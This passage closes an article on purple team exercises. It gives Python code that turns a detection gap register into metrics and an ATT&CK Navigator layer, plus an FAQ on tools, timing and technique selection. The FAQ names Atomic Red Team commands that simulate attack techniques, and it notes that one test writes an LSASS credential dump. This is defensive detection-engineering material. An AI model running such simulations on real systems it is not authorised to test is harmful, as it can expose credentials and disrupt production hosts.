Track detection coverage in MITRE ATT&CK Navigator: After each exercise, update your Navigator layer with which techniques are detected (green), detected with gaps (yellow), and not detected (red). This gives leadership a visual representation of detection maturity over time and drives prioritization for the next exercise cycle.
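Added example, not code from the article: computing the four programme metrics from gap register rows and emitting an ATT&CK Navigator layer with the green/yellow/red scheme described above. The register rows, previous-cycle gaps, colours and the Navigator/ATT&CK version strings are constructed or assumed for the example; set the versions to the release you load the layer into.

```python
import json
from statistics import mean

# Colours for the three Navigator states the article names. Any hex works;
# these are chosen here, not prescribed by Navigator.
COLOR_DETECTED, COLOR_GAP, COLOR_MISSED = "#4caf50", "#ffc107", "#f44336"

# Constructed gap register rows, mirroring the Gap Register Template columns.
GAP_REGISTER = [
    {"scenario": "Encoded PowerShell", "technique": "T1059.001", "fired": False,
     "ttd_min": None, "quality": "None", "status": "Open",
     "root_cause": "Command-line auditing not applied to server OU"},
    {"scenario": "LSASS Access", "technique": "T1003.001", "fired": True,
     "ttd_min": 4, "quality": "Low", "status": "Open",
     "root_cause": "Log shipper drops SourceImage from Event ID 10"},
    {"scenario": "PsExec Lateral", "technique": "T1021.002", "fired": True,
     "ttd_min": 2, "quality": "High", "status": "Closed", "root_cause": None},
    {"scenario": "Kerberoasting", "technique": "T1558.003", "fired": True,
     "ttd_min": 7, "quality": "Medium", "status": "Open",
     "root_cause": "Alert lacks requesting account"},
]
# Gaps carried over from the previous cycle, with their status at this exercise.
PREVIOUS_GAPS = [{"technique": "T1547.001", "status": "Closed"},
                 {"technique": "T1074.001", "status": "Open"}]


def metrics(register, previous_gaps):
    """The four programme metrics as fractions (MTTD in minutes). Alert fidelity
    here = share of fired alerts scored High, one reasonable reading of
    'correctly identified the technique without false context'."""
    fired = [r for r in register if r["fired"]]
    closed = [g for g in previous_gaps if g["status"] == "Closed"]
    return {
        "detection_rate": len(fired) / len(register) if register else 0.0,
        "mttd_min": mean([r["ttd_min"] for r in fired]) if fired else None,
        "alert_fidelity": (sum(1 for r in fired if r["quality"] == "High") / len(fired)
                           if fired else 0.0),
        "gap_closure_rate": len(closed) / len(previous_gaps) if previous_gaps else None,
    }


def technique_color(row):
    if not row["fired"]:
        return COLOR_MISSED
    return COLOR_DETECTED if row["quality"] == "High" else COLOR_GAP


def navigator_layer(register, name="Purple team coverage"):
    """Build an ATT&CK Navigator layer dict. The version strings are assumptions:
    set them to the Navigator / ATT&CK release you actually load into."""
    techniques = []
    for r in register:
        if r["fired"]:
            comment = f"{r['scenario']}: alert in {r['ttd_min']} min, quality {r['quality']}"
        else:
            comment = f"{r['scenario']}: no alert"
        if r["root_cause"]:
            comment += f"; gap: {r['root_cause']}"
        techniques.append({"techniqueID": r["technique"], "color": technique_color(r),
                           "comment": comment, "enabled": True})
    return {
        "name": name,
        "versions": {"attack": "16", "navigator": "5.1.0", "layer": "4.5"},
        "domain": "enterprise-attack",
        "description": "Detection state per technique from the latest purple team gap register",
        "techniques": techniques,
        "legendItems": [{"label": "Detected, high fidelity", "color": COLOR_DETECTED},
                        {"label": "Detected with gaps", "color": COLOR_GAP},
                        {"label": "Not detected", "color": COLOR_MISSED}],
    }


def layer_json(register, name="Purple team coverage"):
    """Serialised layer, ready to save as a .json file and open in Navigator."""
    return json.dumps(navigator_layer(register, name), indent=2)


if __name__ == "__main__":
    print(metrics(GAP_REGISTER, PREVIOUS_GAPS))
    print(layer_json(GAP_REGISTER))
```

Re-running this after each exercise with the exported register gives the leadership view the paragraph above describes, and the metrics dict is the same four numbers the debrief reads out.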

The bottom line

Purple team exercises work because they make detection gaps visible the same day they're found. Start small: three scenarios, a half-day session, six people. The gap register output from your first session will immediately tell you whether your logging or your rules are the bottleneck -- and that answer changes everything about where you invest next.

Frequently asked questions

What is the difference between a purple team exercise and a red team engagement?

A red team engagement is adversarial and covert -- the red team tries to achieve objectives without the blue team knowing. A purple team exercise is collaborative: the red team and blue team work together in near-real time, the red team executes techniques, and both teams immediately discuss whether detection fired and why. Purple team exercises are more efficient for improving detection coverage because you get direct feedback on every technique rather than a report weeks later.

How long should a purple team exercise take?

Plan about 15 minutes per scenario card for execution and the detection check when the test host, atomics and SIEM queries are prepared in advance, as in the calendar template above; budget 45-90 minutes per card when the scenario needs lab setup (a domain-joined host for Kerberoasting, a host pair for PsExec) or when you intend to debug a missing detection live. At the longer pace a half-day session covers 3-4 scenarios and a full day 6-8. For teams new to purple teaming, start with a 3-scenario half-day focused on your highest-priority threat actor TTPs before planning full-week exercises.

What tools do you need to run a purple team exercise?

Red side: Atomic Red Team for executing ATT&CK techniques safely (open source), Caldera for automated technique chaining (MITRE open source), or a commercial BAS platform like Cymulate or AttackIQ. Blue side: your SIEM, EDR console, and any detection-as-code repository (Sigma rules). Both sides need a shared collaboration channel (Slack/Teams) and a shared document for tracking results in real time.

How do you measure the success of a purple team exercise?

Track four metrics: detection rate (percentage of techniques that fired an alert), mean time to detect (MTTD from technique execution to alert), alert fidelity (percentage of alerts that correctly identified the technique without false context), and gap closure rate (percentage of identified detection gaps remediated by the next exercise). Target: 80%+ detection rate for Tier 1 threats within two exercise cycles.

Should you notify the full SOC team before a purple team exercise?

Yes. Purple team exercises are not about testing whether the SOC is paying attention -- they're about validating detection engineering. Notify the SOC lead and relevant analysts in advance. Having an analyst actively monitor during execution gives real-time feedback on alert context quality, which is as valuable as whether the alert fires at all.

How do you prioritize which ATT&CK techniques to test?

Prioritize by three factors: (1) techniques used by threat actors in your industry -- check CISA advisories, ISAC reports, and vendor threat intelligence; (2) techniques that would cause highest impact if successful (credential access, lateral movement, data exfiltration); (3) techniques where your detection coverage is unknown or assumed. Avoid starting with techniques you're confident you detect -- exercise time is most valuable on unknowns.

What is Atomic Red Team and how do you use it in a purple team exercise?

Atomic Red Team is an open-source library of small, documented tests (atomics) that each execute one ATT&CK technique or sub-technique. Install the execution framework with Install-Module -Name invoke-atomicredteam, then fetch the atomics folder separately as the project README describes. Execute a specific atomic with Invoke-AtomicTest T1059.001 -TestNumbers 1; run it with -CheckPrereqs first and -Cleanup afterwards. Atomics are small, but not all are harmless: some make persistent changes or write sensitive artifacts (the T1003.001 procdump test writes an LSASS memory dump), so read the atomic's YAML before running it, and use it on a test endpoint in your lab environment, not production.

Sources & references

  1. MITRE ATT&CK
  2. Atomic Red Team (Red Canary)
  3. SANS Purple Team Survey
  4. Falco Open Source Runtime Security
  5. Palo Alto Cloud Threat Report
  6. Wiz State of Cloud Security 2024


Author: Eric Bang, Founder & Cybersecurity Evangelist, Decryption Digest

Cybersecurity professional with expertise in threat intelligence, vulnerability research, and enterprise security. Covers zero-days, ransomware, and nation-state operations for 50,000+ security professionals weekly.
